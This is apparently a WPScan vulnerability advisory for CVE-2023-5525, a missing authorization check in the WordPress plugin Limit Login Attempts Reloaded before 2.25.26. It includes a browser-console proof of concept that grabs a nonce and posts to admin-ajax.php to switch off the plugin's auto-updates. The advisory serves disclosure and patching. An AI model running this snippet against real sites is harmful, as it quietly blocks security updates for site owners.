Limit Login Attempts Reloaded < 2.25.26 – Admin+ Missing Authorization to Toggle Plugin Auto-Update | CVE 2023-5525 | Plugin Vulnerabilities

Description

The plugin is missing authorization on the `toggle_auto_update` AJAX action, allowing any user with a valid nonce to toggle the auto-update status of the plugin.

Proof of Concept

As an Admin, open the Limit Login Attempts page in WP Admin and run the following code in the browser console:

nonce = document.documentElement.innerHTML.match( /sec: '(\w+)'/ )[1];
await (await fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "action=toggle_auto_update&value=no&sec=" + nonce,
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
})).text();

Check and see that auto-updates have been disabled for the Limit Login Attempts plugin.

Affects Plugins

limit-login-attempts-reloaded

Fixed in 2.25.26

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Alex Sanford

Submitter

Alex Sanford

Submitter website

https://wpscan.com

Verified

Yes

WPVDB ID

654bad15-1c88-446a-b28b-5a412cc0399d

Timeline

Publicly Published

2023-11-06 (about 2 years ago)

Added

2023-11-06 (about 2 years ago)

Last Updated

2023-11-06 (about 2 years ago)

Other

Published

Title

Published

2024-11-11

Title

Pie Register Premium < 3.8.3.3 - Missing Authorization

Published

2021-12-22

Title

Contact Form & Lead Form Elementor Builder < 1.6.8 - Subscriber+ Arbitrary Lead Deletion

Published

2025-10-16

Title

Acknowledgify < 1.1.4 - Missing Authorization

Published

2024-08-09

Title

Meta Box – WordPress Custom Fields Framework < 5.9.11 - Missing Authorization to Information Exposure

Published

2024-01-04

Title

Cloudflare < 4.12.3 - Missing Authorization via initProxy